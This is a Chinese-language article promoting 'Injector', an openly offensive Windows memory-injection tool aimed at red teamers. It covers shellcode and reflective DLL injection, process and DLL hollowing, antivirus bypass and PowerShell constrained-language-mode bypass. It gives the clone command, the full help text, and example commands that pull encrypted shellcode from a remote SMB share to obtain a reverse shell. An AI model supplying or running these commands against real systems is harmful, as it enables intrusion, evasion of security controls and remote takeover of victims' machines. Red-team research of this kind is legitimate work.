关于InjectorInjector是一款功能齐全、功能强大的内存注入工具,集成了多种技术,帮助红队科研人员实现Windows系统下的内存注入。注射器能做什么?为远程服务器和本地存储提供Shellcode注入支持。只需指定shellcode文件,该工具就会帮助我们完成后续的所有工作。默认情况下,该工具会将Shellcode注入到exe中。如果没有找到目标进程,它会创建一个记事本进程并将其注入其中进行持续感染。支持反射DLL注入,该工具将下载DLL并将其注入到远程进程中。通过exe实现进程挖空。使用-bypass参数支持使用更高级别、未记录的API进行进程注入。支持加密的Shellcode,如AES加密或XOR加密等。支持PowerShell的CLM绕过,可以直接将代码保存在阻止C#代码执行的白名单文件夹中,如“C:\Windows\Tasks”。支持DLL挖空,通过dll实现。工具下载研究人员可以使用以下命令将项目的源代码克隆到本地:gitclonehttps://github.com/0xDivyanshu/Injector.git工具帮助C:\Users\admin>Injector.exeHelpOptionsforXenon:-mModeofoperation-m1SpecifiesthemodeasProcessinjection-m2SpecifiesthemodeasReflectiveDLLInjection-m3SpecifiesthemodeasProcessHollowing-m4Noinjection!Givememydamnshell-m5PowershellsessionviaCLMbypass-m6DLLhollowing-TempFileFilelocationthatyourcurrentusercanread-shellcodeUseshellcode-dllUsedll-decrypt-xorSpecifyXordecryptionforshellcode-passSpeciftythepasswordforXordecryption-decrypt-aesSpecifyaesdecryptionforshellcode-passSpeciftythepasswordforaesdecryption-locationSpecifythelocationi.eeitherserverorlocal-bypassUsesenhanceattemptstobypassAV如需生成加密的Shellcode,请在Kali下使用Helper.exe。工具使用示例Injector.exe-m=1-shellcode-encrypt-aes-pass=password-location="\\192.x.x.x\share\shellcode.txt"-bypass上面的命令会解密你的Shellcode并给你一个Reverse壳。如果不想使用加密的Shellcode,也可以直接运行如下命令:Injector.exe-m=1-shellcode-location="\\192.x.x.x\share\shellcode.txt"where"-m=1”改为“2,3,4,6”,可以运行其他模式:Injector.exe-m=5-TempFile=C:\\Users\\user\\sample.txt以上命令将提供给给会话,我们可以用它来执行IEXcradle并获得一个绕过CLM的反向shell。PowerShell也可以使用Invoke-Exe.ps1通过PowerShel执行Injector:Invoke-Exe-locC:\Users\john\injector.exe项目地址Injector:[GitHub传送门]
